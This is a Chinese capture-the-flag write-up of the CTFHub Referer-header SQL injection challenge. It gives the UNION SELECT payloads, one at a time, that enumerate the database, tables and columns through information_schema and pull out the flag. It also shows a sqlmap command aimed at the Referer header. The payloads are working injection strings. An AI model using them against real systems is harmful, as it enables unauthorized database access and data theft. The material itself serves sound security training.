CTFHUB技能树之SQL——Refer注入

开启靶场,打开链接:

直接挑明是Refer注入


用burp抓包发送到repeater:

发现缺少referer报文头,添加一下,判断是整数型注入还是字符型注入:

Referer: 1 and 1=1#

正常回显

1 and 1=2#

回显错误,说明是整数型注入


(1)判断一下字段数

1 order by 2#

正常回显

1 order by 3#

回显错误,说明字段数是2


(2)查看数据库位置

1 union select 1,2#

看样子可能不在数据库中,老样子,改成-1 union select 1,2#

回显成功


(3)爆数据库名

-1 union select 1,database()#

得知数据库名是sqli


(4)爆表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#

得知vjrnfqmoar表和news表


(5)爆列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='vjrnfqmoar'#

得知pnzslmlazg列


(6)爆字段内容(flag)

-1 union select 1,group_concat(pnzslmlazg) from sqli.vjrnfqmoar#

成功得到flag:

ctfhub{089baee1ea8dd6cad48f1bd4}


用sqlmap试试:

新建文件ctfhubreferer.txt,写入以下内容:

GET / HTTP/1.1
Host: challenge-8a30b95775dcd2d8.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-GPC: 1
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Referer: 1

存到sqlmap的根目录下:


python sqlmap.py -r ctfhubreferer.txt -p referer --level 5 --dbs

但是出错了,换成kali的sqlmap试了试也还是不行,不知道什么原因

相关推荐
夏木~18 分钟前
Oracle 中什么情况下 可以使用 EXISTS 替代 IN 提高查询效率
数据库·oracle
W215520 分钟前
Liunx下MySQL:表的约束
数据库·mysql
星河梦瑾22 分钟前
SpringBoot相关漏洞学习资料
java·经验分享·spring boot·安全
黄名富25 分钟前
Redis 附加功能(二)— 自动过期、流水线与事务及Lua脚本
java·数据库·redis·lua
言、雲30 分钟前
从tryLock()源码来出发,解析Redisson的重试机制和看门狗机制
java·开发语言·数据库
一个程序员_zhangzhen1 小时前
sqlserver新建用户并分配对视图的只读权限
数据库·sqlserver
zfj3211 小时前
学技术学英文:代码中的锁:悲观锁和乐观锁
数据库·乐观锁··悲观锁·竞态条件
吴冰_hogan1 小时前
MySQL InnoDB 存储引擎 Redo Log(重做日志)详解
数据库·oracle
nbsaas-boot2 小时前
探索 JSON 数据在关系型数据库中的应用:MySQL 与 SQL Server 的对比
数据库·mysql·json
cmdch20172 小时前
Mybatis加密解密查询操作(sql前),where要传入加密后的字段时遇到的问题
数据库·sql·mybatis